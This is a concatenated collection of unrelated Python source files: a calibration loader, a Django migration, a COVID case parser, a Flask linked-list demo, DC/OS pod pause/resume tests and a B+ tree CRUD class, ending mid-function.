        to duty cycle (a dead zone below some threshold, then a sigmoid-like
        rise toward maximum flow), so a measured calibration curve is loaded
        from disk; when `response_path` is None an identity curve is used.

        Args:
            response_path: path to a NumPy file relative to the repository
                root (three levels above this module), or None for the
                default `setpoint == duty * 100` identity response.
        """
        if response_path is not None:
            response_path = os.path.join(
                os.path.abspath(os.path.dirname(__file__)), "../../../", response_path
            )
            response_array = np.load(response_path)
        else:
            # Identity response: rows [s, s/100, s/100] for s in 0..100.
            response_array = np.linspace([0, 0, 0], [100, 1, 1], num=101)
        self._response_array = response_array
|
# Program to lowercase the first n characters of a string.


def lowercase_prefix(text, n):
    """Return `text` with its first `n` characters lower-cased.

    Args:
        text (str): the input string.
        n (int): how many leading characters to lower-case; values larger
            than len(text) lower-case the whole string, negative values are
            treated as 0 (the original sliced from the end instead).

    Returns:
        str: the transformed string.
    """
    n = max(0, n)
    return text[:n].lower() + text[n:]


if __name__ == "__main__":
    # input() already returns str; the original's str() wrapper was redundant.
    temp = input("Enter a string in upper case :")
    n = int(input("How many first characters do you want to in lower case:"))
    print(lowercase_prefix(temp, n))
|
# Generated by Django 3.1.4 on 2021-01-24 20:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds Transaction.entry_amount and widens
    Transaction.amount to 4 decimal places / 24 digits (non-editable).
    """

    dependencies = [
        ('finance', '0014_auto_20210121_0152'),
    ]

    operations = [
        migrations.AddField(
            model_name='transaction',
            name='entry_amount',
            field=models.DecimalField(decimal_places=2, default=0, max_digits=22, verbose_name='monto introduccido'),
        ),
        migrations.AlterField(
            model_name='transaction',
            name='amount',
            field=models.DecimalField(decimal_places=4, editable=False, max_digits=24, verbose_name='monto'),
        ),
    ]
|
import json
import os
import sys
from datetime import datetime
# Layer code, like parsing_lib, is added to the path by AWS.
# To test locally (e.g. via pytest), we have to modify sys.path.
# pylint: disable=import-error
try:
import parsing_lib
except ImportError:
sys.path.append(
os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'common/python'))
import parsing_lib
def convert_date(raw_date):
    """
    Convert raw date field into a value interpretable by the dataserver.
    The date is listed in YYYY-mm-dd HH:MM:SS format, but the date filtering API
    expects mm/dd/YYYYZ format.

    Dates reported in the Buddhist calendar (543 years ahead of Gregorian)
    are detected by their implausibly large year and corrected.
    """
    date = datetime.strptime(raw_date, "%Y-%m-%d %H:%M:%S")
    if date.year > 2540:
        # Buddhist-calendar year, e.g. 2563 BE == 2020 CE.
        corrected_year = date.year - 543
        return date.strftime(f"%m/%d/{corrected_year}Z")
    return date.strftime("%m/%d/%YZ")
def convert_gender(raw_gender):
    """Normalize an English or Thai gender string to "Male"/"Female".

    Raises:
        ValueError: for any unrecognized value.
    """
    normalized = {
        "Male": "Male",
        "ชาย": "Male",
        "Female": "Female",
        "หญิง": "Female",
    }
    if raw_gender in normalized:
        return normalized[raw_gender]
    raise ValueError(f'Unknown gender: {raw_gender}')
def convert_location(entry):
    """Build a geocoding query dict from a case entry.

    District has no English translation. The English province name is used
    when present and not the literal 'Unknown'; otherwise the Thai name.
    Empty components are dropped from the query.
    """
    province = entry['ProvinceEn']
    if province == 'Unknown' or not province:
        province = entry['Province']
    parts = [entry['District'], province, 'Thailand']
    return {"query": ", ".join(part for part in parts if part)}
def notes(entry):
    """One-line note stating whether the case was in quarantine."""
    in_quarantine = entry['StatQuarantine'] == 1
    return 'Case was in quarantine' if in_quarantine else 'Case was not in quarantine'
def demographics(entry):
    """Build a G.h demographics dict (ageRange/gender), or None if empty."""
    result = {}
    age = entry['Age']
    if age:
        bound = float(age)
        # Exact age: the range collapses to a single point.
        result["ageRange"] = {"start": bound, "end": bound}
    gender = entry['GenderEn'] or entry['Gender']
    if gender:
        result['gender'] = convert_gender(gender)
    return result or None
def parse_cases(raw_data_file, source_id, source_url):
    """Parses G.h-format case data from raw API data.

    Args:
        raw_data_file: path to a JSON file whose 'Data' key holds case entries.
        source_id: G.h source identifier stamped onto each case.
        source_url: upstream source URL stamped onto each case.

    Yields:
        dict: one G.h case document per input entry.
    """
    with open(raw_data_file, "r") as f:
        for entry in json.load(f)['Data']:
            yield {
                "caseReference": {
                    "sourceId": source_id,
                    "sourceEntryId": entry["No"],
                    "sourceUrl": source_url
                },
                "location": convert_location(entry),
                # Confirmation date is a single day, so start == end.
                "events": [
                    {
                        "name": "confirmed",
                        "dateRange":
                        {
                            "start": convert_date(entry["ConfirmDate"]),
                            "end": convert_date(entry["ConfirmDate"]),
                        }
                    }
                ],
                "demographics": demographics(entry),
                "notes": notes(entry),
            }
def lambda_handler(event, context):
    """AWS Lambda entry point: delegate to the shared parsing library."""
    return parsing_lib.run_lambda(event, context, parse_cases)
|
import itertools
from stevedore import extension
# Simple type aliases: recipes and dishes are plain strings in this demo.
Recipe = str
Dish = str
def get_inventory():
    """Return the current ingredient inventory (stub: always empty)."""
    return {}
def get_all_recipes() -> list[Recipe]:
    """Collect recipes from every plugin in the recipe_maker namespace.

    Uses a stevedore ExtensionManager to load all registered entry points
    and flattens each plugin's recipe list into a single list.
    """
    mgr = extension.ExtensionManager(
        namespace='ultimate_kitchen_assistant.recipe_maker',
        invoke_on_load=True,
    )

    def get_recipes(extension):
        # Each loaded plugin object exposes get_recipes().
        return extension.obj.get_recipes()

    return list(itertools.chain.from_iterable(mgr.map(get_recipes)))
from stevedore import driver
def make_dish(recipe: Recipe, module_name: str) -> Dish:
    """Prepare `recipe` using the single plugin named `module_name`.

    Uses a stevedore DriverManager to load exactly one entry point from
    the recipe_maker namespace and asks it to prepare the dish with the
    current inventory.
    """
    mgr = driver.DriverManager(
        namespace='ultimate_kitchen_assistant.recipe_maker',
        name=module_name,
        invoke_on_load=True,
    )
    return mgr.driver.prepare_dish(get_inventory(), recipe)
# Smoke tests executed at import time; they require the demo plugins to be
# installed as entry points.
assert get_all_recipes() == ["Linguine", "Spaghetti", "Taco"]
assert make_dish("Linguine", "pasta_maker") == "Prepared Linguine"
|
#Autor: Olavo M
from flask import Flask, render_template, request, redirect
#import somente do necessario para a interface web
app = Flask(__name__)
class Noh:
    """Singly-linked list node: a value plus a pointer to the next node."""

    def __init__(self, valor):
        self.valor = valor  # may be any type; the web UI treats it as a string
        self.proximo = None  # next node, or None at the tail


class ListaEncadeada:
    """Simple singly-linked list with insertion, printing and in-place reversal."""

    def __init__(self):
        # Starts empty: no head node and zero elements.
        self.prim = None
        self.qtdNoh = 0

    def insere(self, valor):
        """Append `valor` at the tail (walks the list, O(n))."""
        if self.qtdNoh == 0:
            # First value becomes the head.
            self.prim = Noh(valor)
        else:
            nohAtual = self.prim
            while nohAtual.proximo is not None:
                nohAtual = nohAtual.proximo
            nohAtual.proximo = Noh(valor)
        self.qtdNoh += 1

    def imprime(self):
        """Return the values as one string, each followed by a space."""
        partes = []
        cursor = self.prim
        while cursor is not None:
            partes.append(str(cursor.valor) + " ")
            cursor = cursor.proximo
        return "".join(partes)

    def inverte(self):
        """Reverse the list in place in O(n) using three pointers.

        Returns the new head node (or None for an empty list).
        Fixed: the original dereferenced self.prim.proximo unconditionally,
        crashing with AttributeError on an empty list.
        """
        if self.prim is None:
            return None
        anterior = None
        atual = self.prim
        proximo = atual.proximo
        while proximo is not None:
            # Flip the `proximo` pointer one node at a time.
            atual.proximo = anterior
            anterior = atual
            atual = proximo
            proximo = proximo.proximo
        atual.proximo = anterior  # finish the last node
        self.prim = atual  # the old tail becomes the new head
        return atual
# Module-level list shared by all requests (single-process demo only).
Lista = ListaEncadeada()


@app.route("/", methods=['POST', 'GET'])
def index():
    """Web UI: POST inserts a form value into the list; GET renders it.

    A GET carrying the `inverter` query parameter reverses the list first.
    """
    if request.method == "POST":
        # Insert the submitted value, then redirect (post/redirect/get).
        var = request.form["valor"]
        Lista.insere(var)
        print(Lista.imprime())
        return redirect("/")
    else:
        if request.args.get("inverter"):
            # The "invert" button was pressed: reverse the list in place.
            Lista.inverte()
        texto = Lista.imprime()
        return render_template("index.html", elementos=texto)


if __name__ == "__main__":
    app.run()
import logging
import os
import time
import pytest
import sdk_cmd
import sdk_plan
import sdk_tasks
import sdk_upgrade
import sdk_utils
from tests import config
log = logging.getLogger(__name__)

# Defaults for the framework under test; each may be overridden via the
# environment variable of the same name.
FRAMEWORK_NAME = os.environ.get("FRAMEWORK_NAME", "secrets/hello-world")
NUM_HELLO = int(os.environ.get("NUM_HELLO", "2"))
NUM_WORLD = int(os.environ.get("NUM_WORLD", "3"))
def get_task_status(pod_status, task_name):
    """Return the status entry named *task_name* from a `pod status` JSON blob.

    Raises IndexError if no task with that name exists (same as before)."""
    matches = [task for task in pod_status['tasks'] if task['name'] == task_name]
    return matches[0]
def get_task_info(pod_info, task_name):
    """Return the 'info' payload named *task_name* from a `pod info` JSON list.

    Raises IndexError if no entry with that name exists (same as before)."""
    matches = [entry for entry in pod_info if entry['info']['name'] == task_name]
    return matches[0]['info']
@pytest.mark.soak_pod_pause
def test_pause_single_task():
    """Pause one task (hello-0-server) of a two-task pod, then resume it.

    Verifies along the way that: the companion task keeps RUNNING, the
    paused task stays on the same agent, its launch command is swapped for
    a PAUSED placeholder (with a failing readiness check) and restored on
    resume, and the deploy plan ends up COMPLETE again."""
    # get current agent id:
    task_info = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
    )[0]['info']
    old_agent = task_info['slaveId']['value']
    old_cmd = task_info['command']['value']
    # sanity check of pod status/plan status before we pause/resume:
    pod_status = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
    )
    assert len(pod_status['tasks']) == 2
    server_task = get_task_status(pod_status, 'hello-0-server')
    assert server_task['status'] == 'RUNNING'
    phases = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
    )['phases']
    phase = phases[0]
    assert phase['name'] == 'hello-deploy'
    assert phase['status'] == 'COMPLETE'
    assert phase['steps'][0]['name'] == 'hello-0:[server]'
    assert phase['steps'][0]['status'] == 'COMPLETE'
    assert phase['steps'][1]['name'] == 'hello-0:[companion]'
    assert phase['steps'][1]['status'] == 'COMPLETE'
    companion_task = get_task_status(pod_status, 'hello-0-companion')
    assert companion_task['status'] == 'RUNNING'
    # pause the task, wait for it to relaunch
    hello_ids = sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-0')
    pause_result = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'debug pod pause hello-0 -t server', json=True
    )
    assert len(pause_result) == 2
    assert pause_result['pod'] == 'hello-0'
    assert len(pause_result['tasks']) == 1
    assert pause_result['tasks'][0] == 'hello-0-server'
    sdk_tasks.check_tasks_updated(config.SERVICE_NAME, 'hello-0', hello_ids)
    config.check_running()
    # check agent didn't move, and that the command has changed:
    pod_info = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
    )
    assert len(pod_info) == 2
    task_info = get_task_info(pod_info, 'hello-0-server')
    assert old_agent == task_info['slaveId']['value']
    cmd = task_info['command']['value']
    assert 'This task is PAUSED' in cmd
    readiness_check = task_info['check']['command']['command']['value']
    assert 'exit 1' == readiness_check
    # Minus shakedown and a spin function, give the plan a little time to catch up
    time.sleep(2)
    # check PAUSED state
    pod_status = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
    )
    assert len(pod_status['tasks']) == 2
    task_status = get_task_status(pod_status, 'hello-0-server')
    assert task_status['status'] == 'PAUSED'
    # check companion is still running
    task_status = get_task_status(pod_status, 'hello-0-companion')
    assert task_status['status'] == 'RUNNING'
    # resume the pod again, wait for it to relaunch
    hello_ids = sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-0')
    resume_result = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'debug pod resume hello-0 -t server', json=True
    )
    assert len(resume_result) == 2
    assert resume_result['pod'] == 'hello-0'
    assert len(resume_result['tasks']) == 1
    assert resume_result['tasks'][0] == 'hello-0-server'
    sdk_tasks.check_tasks_updated(config.SERVICE_NAME, 'hello-0', hello_ids)
    config.check_running()
    # check again that the agent didn't move:
    task_info = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
    )[0]['info']
    assert old_agent == task_info['slaveId']['value']
    assert old_cmd == task_info['command']['value']
    # Minus shakedown and a spin function, give the plan a little time to catch up
    time.sleep(2)
    # check that the pod/plan status is back to normal:
    pod_status = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
    )
    assert len(pod_status['tasks']) == 2
    task_status = get_task_status(pod_status, 'hello-0-server')
    assert task_status['name'] == 'hello-0-server'
    assert task_status['status'] == 'RUNNING'
    phase = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
    )['phases'][0]
    assert phase['name'] == 'hello-deploy'
    assert phase['status'] == 'COMPLETE'
    assert phase['steps'][0]['name'] == 'hello-0:[server]'
    assert phase['steps'][0]['status'] == 'COMPLETE'
@pytest.mark.soak_pod_pause
def test_pause_all_pod_tasks():
    """Pause an entire pod (both hello-0 tasks at once), then resume it.

    Same checks as the single-task variant, but both server and companion
    must transition RUNNING -> PAUSED -> RUNNING, keep their agent
    placement, and have their original commands restored on resume."""
    # get current agent id:
    pod_info = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
    )
    task_info = get_task_info(pod_info, 'hello-0-server')
    old_agent = task_info['slaveId']['value']
    old_server_cmd = task_info['command']['value']
    task_info = get_task_info(pod_info, 'hello-0-companion')
    old_companion_cmd = task_info['command']['value']
    # sanity check of pod status/plan status before we pause/resume:
    pod_status = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
    )
    assert len(pod_status['tasks']) == 2
    server_task = get_task_status(pod_status, 'hello-0-server')
    assert server_task['status'] == 'RUNNING'
    phase = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
    )['phases'][0]
    assert phase['name'] == 'hello-deploy'
    assert phase['status'] == 'COMPLETE'
    assert phase['steps'][0]['name'] == 'hello-0:[server]'
    assert phase['steps'][0]['status'] == 'COMPLETE'
    assert phase['steps'][1]['name'] == 'hello-0:[companion]'
    assert phase['steps'][1]['status'] == 'COMPLETE'
    companion_task = get_task_status(pod_status, 'hello-0-companion')
    assert companion_task['status'] == 'RUNNING'
    # pause the pod, wait for it to relaunch
    hello_ids = sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-0')
    pause_result = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'debug pod pause hello-0', json=True
    )
    assert len(pause_result) == 2
    assert pause_result['pod'] == 'hello-0'
    assert len(pause_result['tasks']) == 2
    assert 'hello-0-server' in pause_result['tasks']
    assert 'hello-0-companion' in pause_result['tasks']
    sdk_tasks.check_tasks_updated(config.SERVICE_NAME, 'hello-0', hello_ids)
    config.check_running()
    # check agent didn't move, and that the commands have changed:
    pod_info = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
    )
    assert len(pod_info) == 2
    task_info = get_task_info(pod_info, 'hello-0-server')
    assert old_agent == task_info['slaveId']['value']
    cmd = task_info['command']['value']
    assert 'This task is PAUSED' in cmd
    readiness_check = task_info['check']['command']['command']['value']
    assert 'exit 1' == readiness_check
    task_info = get_task_info(pod_info, 'hello-0-companion')
    assert old_agent == task_info['slaveId']['value']
    cmd = task_info['command']['value']
    assert 'This task is PAUSED' in cmd
    readiness_check = task_info['check']['command']['command']['value']
    assert 'exit 1' == readiness_check
    # Minus shakedown and a spin function, give the plan a little time to catch up
    time.sleep(3)
    # check PAUSED state
    pod_status = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
    )
    assert len(pod_status['tasks']) == 2
    task_status = get_task_status(pod_status, 'hello-0-server')
    assert task_status['status'] == 'PAUSED'
    task_status = get_task_status(pod_status, 'hello-0-companion')
    assert task_status['status'] == 'PAUSED'
    # resume the pod again, wait for it to relaunch
    hello_ids = sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-0')
    resume_result = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'debug pod resume hello-0', json=True
    )
    assert len(resume_result) == 2
    assert resume_result['pod'] == 'hello-0'
    assert len(resume_result['tasks']) == 2
    assert 'hello-0-server' in resume_result['tasks']
    assert 'hello-0-companion' in resume_result['tasks']
    sdk_tasks.check_tasks_updated(config.SERVICE_NAME, 'hello-0', hello_ids)
    config.check_running()
    # check again that the agent didn't move:
    pod_info = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-0', json=True
    )
    task_info = get_task_info(pod_info, 'hello-0-server')
    assert old_agent == task_info['slaveId']['value']
    assert old_server_cmd == task_info['command']['value']
    task_info = get_task_info(pod_info, 'hello-0-companion')
    assert old_agent == task_info['slaveId']['value']
    assert old_companion_cmd == task_info['command']['value']
    # Minus shakedown and a spin function, give the plan a little time to catch up
    time.sleep(2)
    # check that the pod/plan status is back to normal:
    pod_status = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-0 --json', json=True
    )
    assert len(pod_status['tasks']) == 2
    task_status = get_task_status(pod_status, 'hello-0-server')
    assert task_status['status'] == 'RUNNING'
    task_status = get_task_status(pod_status, 'hello-0-companion')
    assert task_status['status'] == 'RUNNING'
    phase = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
    )['phases'][0]
    assert phase['name'] == 'hello-deploy'
    assert phase['status'] == 'COMPLETE'
    assert phase['steps'][0]['name'] == 'hello-0:[server]'
    assert phase['steps'][0]['status'] == 'COMPLETE'
    assert phase['steps'][1]['name'] == 'hello-0:[companion]'
    assert phase['steps'][1]['status'] == 'COMPLETE'
@pytest.mark.soak_pod_pause
def test_multiple_pod_pause():
    """Pause the server task of ten pods (hello-0..hello-9) at once, verify
    all reach PAUSED while their companions and the untouched 11th pod
    (hello-10) stay RUNNING, then resume them all and verify full recovery.

    Note: assumes the service is deployed with at least 11 hello pods."""
    pod_agents = []
    pod_commands = []
    # get agent id for each hello pod we're pausing:
    for i in range(10):
        task_info = sdk_cmd.svc_cli(
            config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-{}'.format(i), json=True
        )[0]['info']
        pod_agents.append(task_info['slaveId']['value'])
        pod_commands.append(task_info['command']['value'])
    # check that their respective deploy steps are complete, and their tasks are running
    phase = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
    )['phases'][0]
    assert phase['name'] == 'hello-deploy'
    assert phase['status'] == 'COMPLETE'
    for i in range(10):
        pod_status = sdk_cmd.svc_cli(
            config.PACKAGE_NAME,
            config.SERVICE_NAME,
            'pod status hello-{} --json'.format(i),
            json=True
        )
        assert len(pod_status['tasks']) == 2
        task_status = get_task_status(pod_status, 'hello-{}-server'.format(i))['status']
        assert task_status == 'RUNNING'
        task_status = get_task_status(pod_status, 'hello-{}-companion'.format(i))['status']
        assert task_status == 'RUNNING'
        # deploy steps come in (server, companion) pairs per pod
        assert phase['steps'][i * 2]['name'] == 'hello-{}:[server]'.format(i)
        assert phase['steps'][i * 2]['status'] == 'COMPLETE'
        assert phase['steps'][i * 2 + 1]['name'] == 'hello-{}:[companion]'.format(i)
        assert phase['steps'][i * 2 + 1]['status'] == 'COMPLETE'
    # get current task ids for all pods
    pod_task_ids = []
    for i in range(10):
        pod_task_ids.append(
            sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-{}-server'.format(i))
        )
    # pause all hello pods
    pause_results = []
    for i in range(10):
        pause_results.append(sdk_cmd.svc_cli(
            config.PACKAGE_NAME,
            config.SERVICE_NAME,
            'debug pod pause hello-{} -t server'.format(i),
            json=True
        ))
    # verify pauses were all successful
    for i, pause_result in enumerate(pause_results):
        assert len(pause_result) == 2
        assert pause_result['pod'] == 'hello-{}'.format(i)
        assert len(pause_result['tasks']) == 1
        assert pause_result['tasks'][0] == 'hello-{}-server'.format(i)
        sdk_tasks.check_tasks_updated(
            config.SERVICE_NAME, 'hello-{}-server'.format(i), pod_task_ids[i]
        )
    config.check_running()
    # verify that they're on the agents, and with different commands
    for i in range(10):
        pod_info = sdk_cmd.svc_cli(
            config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-{}'.format(i), json=True
        )
        assert len(pod_info) == 2
        task_info = get_task_info(pod_info, 'hello-{}-server'.format(i))
        assert pod_agents[i] == task_info['slaveId']['value']
        cmd = task_info['command']['value']
        assert 'This task is PAUSED' in cmd
        readiness_check = task_info['check']['command']['command']['value']
        assert 'exit 1' == readiness_check
    # verify they've all reached the PAUSED state in plan and pod status:
    for i in range(10):
        pod_status = sdk_cmd.svc_cli(
            config.PACKAGE_NAME,
            config.SERVICE_NAME,
            'pod status hello-{} --json'.format(i),
            json=True
        )
        assert len(pod_status['tasks']) == 2
        task_status = get_task_status(pod_status, 'hello-{}-server'.format(i))
        assert task_status['status'] == 'PAUSED'
        task_status = get_task_status(pod_status, 'hello-{}-companion'.format(i))
        assert task_status['status'] == 'RUNNING'
    # verify that the 11th hello pod is unaffacted
    pod_status = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'pod status hello-10 --json', json=True
    )
    assert len(pod_status['tasks']) == 2
    task_status = get_task_status(pod_status, 'hello-10-server')
    assert task_status['status'] == 'RUNNING'
    task_status = get_task_status(pod_status, 'hello-10-companion')
    assert task_status['status'] == 'RUNNING'
    assert phase['steps'][20]['name'] == 'hello-10:[server]'
    assert phase['steps'][20]['status'] == 'COMPLETE'
    assert phase['steps'][21]['name'] == 'hello-10:[companion]'
    assert phase['steps'][21]['status'] == 'COMPLETE'
    # get paused task ids
    paused_pod_task_ids = []
    for i in range(10):
        paused_pod_task_ids.append(
            sdk_tasks.get_task_ids(config.SERVICE_NAME, 'hello-{}-server'.format(i))
        )
    # resume all pods
    resume_results = []
    for i in range(10):
        resume_results.append(sdk_cmd.svc_cli(
            config.PACKAGE_NAME,
            config.SERVICE_NAME,
            'debug pod resume hello-{} -t server'.format(i),
            json=True
        ))
    # verify that the resumes were successful
    for i, resume_result in enumerate(resume_results):
        assert len(resume_result) == 2
        assert resume_result['pod'] == 'hello-{}'.format(i)
        assert len(resume_result['tasks']) == 1
        assert resume_result['tasks'][0] == 'hello-{}-server'.format(i)
        sdk_tasks.check_tasks_updated(
            config.SERVICE_NAME, 'hello-{}-server'.format(i), paused_pod_task_ids[i]
        )
    config.check_running()
    # verify that the agents are still the same, and the commands are restored
    for i in range(10):
        pod_info = sdk_cmd.svc_cli(
            config.PACKAGE_NAME, config.SERVICE_NAME, 'pod info hello-{}'.format(i), json=True
        )
        task_info = get_task_info(pod_info, 'hello-{}-server'.format(i))
        assert pod_agents[i] == task_info['slaveId']['value']
        assert pod_commands[i] == task_info['command']['value']
    phase = sdk_cmd.svc_cli(
        config.PACKAGE_NAME, config.SERVICE_NAME, 'plan status deploy --json', json=True
    )['phases'][0]
    assert phase['name'] == 'hello-deploy'
    assert phase['status'] == 'COMPLETE'
    # verify they've all reached the COMPLETE state in plan and pod status:
    for i in range(10):
        pod_status = sdk_cmd.svc_cli(
            config.PACKAGE_NAME,
            config.SERVICE_NAME,
            'pod status hello-{} --json'.format(i),
            json=True
        )
        assert len(pod_status['tasks']) == 2
        task_status = get_task_status(pod_status, 'hello-{}-server'.format(i))
        assert task_status['status'] == 'RUNNING'
        assert phase['steps'][i * 2]['name'] == 'hello-{}:[server]'.format(i)
        assert phase['steps'][i * 2]['status'] == 'COMPLETE'
        assert phase['steps'][i * 2 + 1]['name'] == 'hello-{}:[companion]'.format(i)
        assert phase['steps'][i * 2 + 1]['status'] == 'COMPLETE'
|
#!/usr/bin/env python
__author__ = 'Michael Meisinger'
from pyon.core.governance import ANONYMOUS_ACTOR
from pyon.public import log, CFG, BadRequest, EventPublisher, Conflict, Unauthorized, NotFound, PRED, OT, RT
from interface.services.scion.iscion_management import BaseScionManagement
class ScionManagementServiceBase(BaseScionManagement):
    """Shared base for Scion management services: caches container clients
    and provides helpers for resolving the calling actor from the request
    context."""

    def on_init(self):
        # Cache the frequently-used container clients/repositories on the instance.
        self.rr = self.clients.resource_registry
        self.event_repo = self.container.event_repository
        self.idm_client = self.clients.identity_management
        self.rm_client = self.clients.resource_management
        self.evt_pub = EventPublisher(process=self)

    # -------------------------------------------------------------------------

    def _get_actor_id(self):
        """Return the ion-actor-id from the context, if set and present.
        Note: may return the string 'anonymous' for an unauthenticated user"""
        ctx = self.get_context()
        return ctx.get('ion-actor-id', None) if ctx else None

    def _actor_context(self):
        """Return a dict carrying the current actor id (see _get_actor_id)."""
        # Reuse _get_actor_id instead of duplicating the context lookup.
        return dict(actor_id=self._get_actor_id())

    def _get_actor_roles(self):
        """Return the ion-actor-roles from the context, if set and present."""
        ctx = self.get_context()
        return ctx.get('ion-actor-roles', {}) if ctx else {}

    def _as_actor_id(self, actor_id=None):
        """Resolve the effective actor id: an explicit *actor_id* wins,
        otherwise the authenticated caller's id; ANONYMOUS_ACTOR counts as
        no authenticated caller."""
        current_actor_id = self._get_actor_id()
        if current_actor_id == ANONYMOUS_ACTOR:
            current_actor_id = None
        if actor_id and not current_actor_id:
            # Explicit actor supplied by an unauthenticated caller.
            # This may be ok for some guest calls, but is dangerous
            pass
        elif actor_id and actor_id != current_actor_id:
            # Acting on behalf of a different actor.
            # This should only be allowed for a superuser or within the same org
            pass
        return actor_id or current_actor_id
|
# Package: Python
# License: Released under MIT License
# Notice: Copyright (c) 2020 TytusDB Team
# Developer: Maynor Piló Tuy
import os
import time
from storageManager.ArbolBmas import ArbolBmas
# CLASE PARA INSTANCIAR CADA UNA DE LAS FUNCIONES :
class CrudTuplas:
    """Tuple-level CRUD operations for one table, backed by a B+ tree (ArbolBmas).

    Shared return-code convention:
      0 = success, 1 = operation error, 4 = primary-key conflict/missing,
      5 = column index out of bounds.
    """

    def __init__(self, columas):
        self.pk = []             # indices of the primary-key columns, provided by the table
        self.auto = 0            # auto-increment key counter used when no PK is defined
        self.tamCol = columas    # number of columns declared for the table
        self.pkactuales = []     # composite keys currently stored (duplicate detection)
        self.tabla = ArbolBmas()

    # ------------------------------------------------------------------
    # internal helpers
    # ------------------------------------------------------------------

    def _build_key(self, values):
        """Join *values* with '_' into the composite string key used by the tree."""
        return "_".join(str(v) for v in values)

    # ------------------------------------------------------------------
    # tuple CRUD
    # ------------------------------------------------------------------

    def insert(self, tupla):
        """Insert *tupla*: 0 ok, 4 duplicate PK, 5 wrong column count, 1 error."""
        try:
            if len(tupla) != self.tamCol:
                # column count does not match the table definition
                return 5
            if self.pk:  # table has explicit primary keys
                pkey = self._build_key(tupla[k] for k in self.pk)
                if pkey in self.pkactuales:
                    return 4
                self.tabla.insertar(str(pkey), tupla)
                self.pkactuales.append(pkey)
                return 0
            # no PK defined: key the record with the auto-increment counter
            self.tabla.insertar(str(self.auto), tupla)
            self.pkactuales.append(str(self.auto))
            self.auto += 1
            return 0
        except IndexError:
            # a PK index pointed outside the tuple
            return 1

    def loadCSV(self, file):
        """Bulk-insert every line of CSV *file*; returns the per-line insert
        codes, or an empty list when the file cannot be read."""
        try:
            # `with` guarantees the handle is closed even if reading fails
            # (the original leaked the handle on a mid-read IOError).
            with open(file, 'r', encoding='UTF-8') as archivo:
                data = archivo.readlines()
        except IOError:
            return []
        return [self.insert(line.rstrip('\r\n\t').split(",")) for line in data]

    def extractRow(self, columns):
        """Return the record whose PK values are *columns* (tree lookup result)."""
        return self.tabla.Busqueda(self._build_key(columns))

    def update(self, register, columns):
        """Update the record keyed by *columns* with dict *register*;
        returns the tree's code (0 ok, 1 error, 4 key missing)."""
        return self.tabla.Update(register, self._build_key(columns))

    def delete(self, columns):
        """Delete the record keyed by *columns*: 0 ok, 4 key missing, 1 error."""
        try:
            pkey = self._build_key(columns)
            if self.tabla.eliminar(pkey):
                # Bug fix: keep the duplicate-detection list in sync so a
                # deleted key can be inserted again later.
                if pkey in self.pkactuales:
                    self.pkactuales.remove(pkey)
                return 0
            return 4
        except TypeError:
            return 1

    def truncateRaiz(self):
        """Drop every record by resetting the tree's root."""
        self.tabla.truncateRoot()

    # ------------------------------------------------------------------
    # table-level helpers
    # ------------------------------------------------------------------

    def extractTable(self):
        """Return every record in the table, or an empty list."""
        return self.tabla.ListaEnlazada(None, None, None)

    def extractRangeTable(self, columns, lower, upper):
        """Return the records whose *columns*-th value lies within [lower, upper]."""
        return self.tabla.ListaEnlazada(columns, lower, upper)

    def alterAddPK(self, keys):
        """Declare *keys* (column indices) as the primary key.
        0 ok, 1 duplicate key values already present, 4 PK already defined,
        5 key index out of range."""
        if self.pk:
            # a primary key is already defined
            return 4
        # NOTE(review): this accepts k == tamCol even though valid indices are
        # 0..tamCol-1 (kept as-is; out-of-range keys still surface as code 5/1
        # later) — confirm the intended bound.
        for k in keys:
            if k > self.tamCol:
                return 5
        listado = self.tabla.Claves_Hojas()
        if len(listado) == 0:
            # empty table: just record the key columns
            self.pk = keys
            return 0
        # table already has records: adopt the keys, then validate/re-key
        self.pk = keys
        pktemp = []  # would-be composite keys, for duplicate detection
        try:
            for d in listado:
                pkey = self._build_key(d.data[k] for k in self.pk)
